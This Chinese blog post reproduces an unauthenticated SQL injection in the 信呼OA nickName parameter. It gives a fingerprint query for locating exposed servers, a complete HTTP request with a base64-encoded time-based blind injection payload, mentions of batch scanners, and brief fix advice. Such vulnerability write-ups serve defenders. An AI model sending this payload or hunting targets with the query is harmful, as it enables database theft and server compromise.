【漏洞复现】信呼OA nickName SQL注入漏洞(XVE-2024-19304)

于 2024-08-13 10:58:29 发布
阅读量232 收藏 1
点赞数 6
分类专栏: 漏洞复现篇 文章标签: sql 信呼OA
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60571842/article/details/141158186
版权

0x01 产品简介

信呼OA系统是一款功能丰富、灵活易用的协同办公系统,适合中小型企业使用。其免费开源的特性使得用户可以根据自己的需求进行二次开发和定制化改造,从而更好地满足企业的管理需求。同时,系统的跨平台支持和数据自管功能也确保了用户的使用体验和数据安全。

0x02 漏洞概述

信呼OA nickName 存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 搜索引擎

app="信呼-OA系统"

在这里插入图片描述

0x04 漏洞复现

GET /index.php?m=openmodhetong|openapi&d=task&a=data&ajaxbool=0&nickName={{base64enc(1' and sleep(8)#)}} HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

0x06 修复建议

1、关闭互联网暴露面或接口设置访问权限
2、升级至安全版本

SuperherRo
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
信呼OA nickName SQL注入漏洞复现(XVE-2024-19304)
0xSec
08-03 261
信呼OAnickName 存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
SeedLabs-Web安全-SQL注入实验
Anonymity
06-16 2544
SeedLabs-Web安全-SQL注入实验 文章目录SeedLabs-Web安全-SQL注入实验前言一、Task1 熟悉SQL语句1. 进入容器内部2.使用基本的SQL语句二、Task2 SQL注入攻击之select2.1 网页SQL注入攻击。2.2 来自命令行的SQL注入攻击。2.3 添加一条新的SQL语句。三、SQL注入攻击之UPDATE3.1 修改自己的薪水。3.2 修改他人工资四、Countermeasure — Prepared Statement 前言 SQL注入的实验记录,基本的不做赘
thinkPHP3.2.3中sql注入漏洞
XINO
05-26 1933
下载:ThinkPHP3.2.3完整版 - ThinkPHP框架 配置 首先配置一下数据库 相对于TP5,可以先看下框架的特定函数 thinkphp3内置了很多大写函数 A 快速实例化Action类库 B 执行行为类 C 配置参数存取方法 D 快速实例化Model类库 F 快速简单文本数据存取方法 I 获取系统输⼊变(与tp5input方法类似) L 语言参数存取方法 M 快速高性能实例化模型 R 快速远程调用Action类方法 S 快速缓存存取方法 U URL动态生成和重定向方法 W 快速Widget输
php 牛牛漏洞,phpcms v9 SQL注入漏洞(第二弹)
weixin_35062801的博客
03-29 1163
第二次玩乌云,等待乌云发BB漏洞文件发生在phpcms\modules\member\index.php中392行public function account_manage_info() { // account_manage_info方法,就是更新个人资料if(isset($_POST['dosubmit'])) {//更新用户昵称$nickname = isset($_POST['nickn...
(SEED-Lab)SQL Injection Attack Lab SQL注入实验
lunan的博客
02-02 4761
(SEED-Lab)SQL Injection Attack Lab SQL注入实验 欢迎大家访问我的GitHub博客 https://lunan0320.cn 文章目录一、实验目的二、实验步骤与结果2 Lab Environment2.1 Apache Confifiguration3 Lab Tasks3.1 Task 1: Get Familiar with SQL Statements3.2 Task 2: SQL Injection Attack on SELECT Statement3.
SQL注入进阶篇-sql-labs合集
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
07-24 2820
工具 HackBar BurpSuite v2.1 基础挑战 Less-1 下面我将以第一关为例,使用四种注入手法 联合查询 http://114.55.107.51/sqli-labs/Less-1/?id=-1' union select 1,2,3--+ 查表 …select table_name from information_schema.tables where table_schema=database() limit 3,1… 查表中字段 …sel..
MyBatis-Plus--多表联查(动态查询)--方法/教程/实例
热门推荐
IT利刃出鞘的博客
03-23 8万+
本文用示例介绍使用MyBatis-Plus进行多表查询的方法,包括静态查询和动态查询。
从入门到入土:[SEED-Lab]-SQL注入攻击|SQL Injection Attack Lab|详细说明|实验步骤|实验截图
Q_U_A_R_T_E_R的博客
10-26 3917
此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出。欢迎各位前来交流。(部分材料来源网络,若有侵权,立即删除) 本人博客所有文章纯属学习之用,不涉及商业利益。不合适引用,自当删除! 若被用于非法行为,与我本人无关 [SEED-Lab]-SQL注入攻击实验环境环境配置apachePDF文件实验 实验环境 seed-ubuntu 20.04 seed自带虚拟机已经安装好了mysql服务,root密码是seedubuntu 实验室环境。该实验室已经在我们预构建的Ubuntu16.04VM上进行
SQL server 练习4(数据库设计(E-R图))
kanlon的博客
07-01 1万+
  这篇博客是我学习SQL server第四个练习,主要是研究如何设计数据库,找出实体间的联系,并建立E-R图(实体联系模型的图形化)。这个数据库设计是以我之前团队的一个项目(校社联社团管理系统)的数据库来的,该项目主要功能是协助学校校社联管理社团,主要功能有最新公告,社团信息,消息发布,注册审核,年度注册。 练习要求   选择一个主题进行设计,完成以下内容: 1、设计概念模型 (1)要求...
sql-ddl-to-json-schema:SQL DDL到JSON模式转换器
05-17
SQL DDL至JSON模式转换器 将SQL DDL语句转换为JSON格式(JSON模式和紧凑格式)。 承诺中 了解内部 手边的脚本Visual Studio程式码 链接 概述 使用以下SQL: CREATE TABLE users ( id INT ( 11 ) NOT NULL AUTO_...
Chinese-NickName-for-Sketch:用于草图的中文昵称生成插件
02-06
《Chinese-NickName-for-Sketch:草图设计中的中文昵称生成插件详解》 在数字设计领域,Sketch是一款广泛使用的矢量图形编辑软件,尤其受到UI/UX设计师的青睐。为了提升设计效率和用户体验,许多插件应运而生,其中...
信息安全_安全编码之SQL注入.pptx
08-14
SQLMap是一款自动化的SQL注入工具,可用于检测和利用SQL注入漏洞。在不同的操作系统上,安装方式如下: 1. Mac系统: ```bash brew install sqlmap ``` 2. Ubuntu系统: ```bash apt install sqlmap ``` 或者...
It-s-Hockey:通过Javascript和Phaser框架开发的基于Air Hockey的项目
02-04
是曲棍球 介绍: 这是Hockey是一款基于Air Hockey游戏的跨平台Web应用程序。 先决条件: Npm 节点 表达 阿帕奇/ MySQL ... nickname varchar ( 15 ) NOT NULL , password varchar ( 40 ) NOT N
Sql与Rce注入相关漏洞复现
最新发布
山月不问人间事
08-12 661
‌这些查询可以是SELECT、‌INSERT、‌UPDATE或DELETE等,‌它们将在数据库中按顺序处理,‌尽管它们是在单个函数调用中发送的。假设我发送的是这样一个请求:i_d=1&i.d=2 ,php先将i.d转换成i_d,即为i_d=1&i_d=2 ,再获取到的$_REQUEST['i_d']就是2。可在$_SERVER['REQUEST_URI']中,i_d和i.d却是两个完全不同的参数名,那么切割覆盖后,获取的$_REQUEST['i_d']却是1。参数是可选的,‌用于限制分割后的数组元素数量。
kubernetes集群部署sql server数据库服务
jiang0615csdn的博客
08-08 487
kubernetes集群部署sql server数据库服务
力扣高频SQL 50题(基础版)第四十二题之1517.查找拥有有效邮箱的用户
m0_70882914的博客
08-09 200
1517.查找拥有有效邮箱的用户
PostgreSQL 触发器
wjs2024的博客
08-10 356
PostgreSQL触发器为数据库管理员和开发者提供了一种强大的工具,用于自动化复杂的数据库操作和强制执行业务规则。正确使用触发器可以提高数据处理的效率和准确性,但同时也需要注意它们可能带来的性能和维护问题。
sql获取过去的小时数
kjl536566的博客
08-08 287
是一条 SQL 语句的一部分,它使用函数来计算两个时间点之间的差异,并将结果标记为pastHours。HOURNOW()ASpastHourspastHours整个表达式的意思是:计算到当前时间 (NOW()) 之间的小时数,并将这个结果命名为pastHours。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperherRo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值